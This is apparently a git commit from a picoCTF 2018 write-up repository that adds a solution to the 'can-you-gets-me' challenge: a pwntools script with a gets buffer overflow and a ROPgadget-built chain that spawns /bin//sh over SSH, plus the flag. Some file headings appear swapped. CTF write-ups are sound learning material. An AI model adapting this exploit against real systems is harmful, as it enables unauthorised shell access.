Added can-you-gets-me

Author: PlatyPew

.gitmodules

@@ -1,3 +1,6 @@
 [submodule "msieve"]
     path = Cryptography/Super Safe RSA/solution/msieve
     url = git://github.com/radii/msieve.git
+[submodule "Binary Exploitation/can-you-gets-me/solution/ROPgadget"]
+	path = Binary Exploitation/can-you-gets-me/solution/ROPgadget
+	url = https://github.com/JonathanSalwan/ROPgadget.git

Binary Exploitation/can-you-gets-me/README.md

@@ -11,7 +11,11 @@ Binary Exploitation
 >This is a classic gets ROP
 
 ## Solution
-Unsolved.
+First, find out the padding required for the buffer overflow. Then, use a rop chain to get the flag.
+
+ROP chain generated by [ROPgadget](https://github.com/JonathanSalwan/ROPgadget).
+
+Working solution [solve.py](solution/solve.py).
 
 ### Flag
-`flag`
+`picoCTF{rOp_yOuR_wAY_tO_AnTHinG_700e9c8e}`

Binary Exploitation/can-you-gets-me/solution/ROPgadget

@@ -0,0 +1,51 @@
+#!/usr/bin/python
+from pwn import *
+
+USER = 'Platy' # Change username accordingly.
+
+padding = 'A' * 28
+# execve generated by ROPgadget
+rop_gadgets = p32(0x0806f02a) # porop_gadgets edx ; ret
+rop_gadgets += p32(0x080ea060) # @ .data
+rop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret
+rop_gadgets += '/bin'
+rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
+rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
+rop_gadgets += p32(0x080ea064) # @ .data + 4
+rop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret
+rop_gadgets += '//sh'
+rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
+rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
+rop_gadgets += p32(0x080ea068) # @ .data + 8
+rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
+rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
+rop_gadgets += p32(0x080481c9) # porop_gadgets ebx ; ret
+rop_gadgets += p32(0x080ea060) # @ .data
+rop_gadgets += p32(0x080de955) # porop_gadgets ecx ; ret
+rop_gadgets += p32(0x080ea068) # @ .data + 8
+rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
+rop_gadgets += p32(0x080ea068) # @ .data + 8
+rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0807a86f) # inc eax ; ret
+rop_gadgets += p32(0x0806cc25) # int 0x80
+
+exploit = padding + rop_gadgets
+
+s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first
+
+py = s.run('cd /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d; ./gets')
+print py.recv()
+py.sendline(exploit)
+py.sendline('cat flag.txt')
+print py.recv()
+py.interactive()

Binary Exploitation/can-you-gets-me/solution/solve.py

@@ -24,7 +24,7 @@ This CTF was done with [@pauxy](https://github.com/pauxy) and [@StopDuckRoll](ht
 - [echo back](Binary%20Exploitation/echo%20back) (Unsolved) - 500
 - [are you root?](Binary%20Exploitation/are%20you%20root%3F) (Unsolved) - 550
 - [gps](Binary%20Exploitation/gps) (Unsolved) - 550
-- [can-you-gets-me](Binary%20Exploitation/can-you-gets-me) (Unsolved) - 650
+- [can-you-gets-me](Binary%20Exploitation/can-you-gets-me) - 650
 
 ## Cryptography
 - [Crypto Warmup 1](Cryptography/Crypto%20Warmup%201) - 75